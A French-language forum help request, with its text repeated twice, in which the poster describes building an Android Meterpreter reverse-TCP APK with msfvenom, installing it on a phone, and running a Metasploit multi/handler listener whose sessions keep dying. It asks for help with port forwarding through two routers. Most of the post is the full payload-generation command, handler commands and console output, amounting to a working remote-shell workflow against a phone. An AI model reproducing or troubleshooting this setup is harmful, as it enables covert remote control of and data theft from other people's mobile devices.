Bonjour,
Je viens chercher un peu d'aide pour avancer dans ma compréhension de Meterpreter sous Android sur mon smartphone.
Je dispose d'une installation Kali 4.11 et de la suite Metasploit sur le PC Attaquant.
J'ai généré ma charge Meterpreter à l'aide de la commande suivante :
msfvenom -p android/meterpreter/reverse_tcp LHOST=ADRESSE-IP-EXTERNE-FREEBOX LPORT=4444 -a dalvik --platform android R -o /pentest-001.apk
Puis, j'ai installé cette charge sur le portable Android 6.0.1 cible et j'ai bien un logiciel MainActivity qui s'affiche.
Ensuite, sur mon PC attaquant, je saisis (en gras) :
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST ADRESSE-IP-LOCAL-PC-ATTAQUANT
LHOST => ADRESSE-IP-LOCAL-PC-ATTAQUANT
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit[*] Exploit running as background job 0.
Là, je lance MainActivity sur le smartphone (connecté en 4G) :
msf exploit(handler) >[*] Sending stage (68925 bytes) to ADRESSE-IP-4G[*] Meterpreter session 5 opened (ADRESSE-IP-LOCAL-PC-ATTAQUANT:4444 -> ADRESSE-IP-4G:11501) at 2017-08-31 13:55:56 +0200
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption[*] 37.168.111.170 - Meterpreter session 5 closed. Reason: Died
J'ai beau répéter l'opération, je n'obtiens jamais le shell Meterpreter.
Une précision, mon PC attaquant se trouve derrière 2 routeurs : ma Freebox et un autre routeur Wifi. Le port 4444 est bien forwardé de ma Freebox vers le routeur sur l'interface Freebox, et du routeur vers mon PC attaquant sur l'interface de mon routeur.
Merci d'avance pour votre aide.
Cordialement.
Je viens chercher un peu d'aide pour avancer dans ma compréhension de Meterpreter sous Android sur mon smartphone.
Je dispose d'une installation Kali 4.11 et de la suite Metasploit sur le PC Attaquant.
J'ai généré ma charge Meterpreter à l'aide de la commande suivante :
msfvenom -p android/meterpreter/reverse_tcp LHOST=ADRESSE-IP-EXTERNE-FREEBOX LPORT=4444 -a dalvik --platform android R -o /pentest-001.apk
Puis, j'ai installé cette charge sur le portable Android 6.0.1 cible et j'ai bien un logiciel MainActivity qui s'affiche.
Ensuite, sur mon PC attaquant, je saisis (en gras) :
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST ADRESSE-IP-LOCAL-PC-ATTAQUANT
LHOST => ADRESSE-IP-LOCAL-PC-ATTAQUANT
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit[*] Exploit running as background job 0.
Là, je lance MainActivity sur le smartphone (connecté en 4G) :
msf exploit(handler) >[*] Sending stage (68925 bytes) to ADRESSE-IP-4G[*] Meterpreter session 5 opened (ADRESSE-IP-LOCAL-PC-ATTAQUANT:4444 -> ADRESSE-IP-4G:11501) at 2017-08-31 13:55:56 +0200
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption[*] 37.168.111.170 - Meterpreter session 5 closed. Reason: Died
J'ai beau répéter l'opération, je n'obtiens jamais le shell Meterpreter.
Une précision, mon PC attaquant se trouve derrière 2 routeurs : ma Freebox et un autre routeur Wifi. Le port 4444 est bien forwardé de ma Freebox vers le routeur sur l'interface Freebox, et du routeur vers mon PC attaquant sur l'interface de mon routeur.
Merci d'avance pour votre aide.
Cordialement.
Commentaire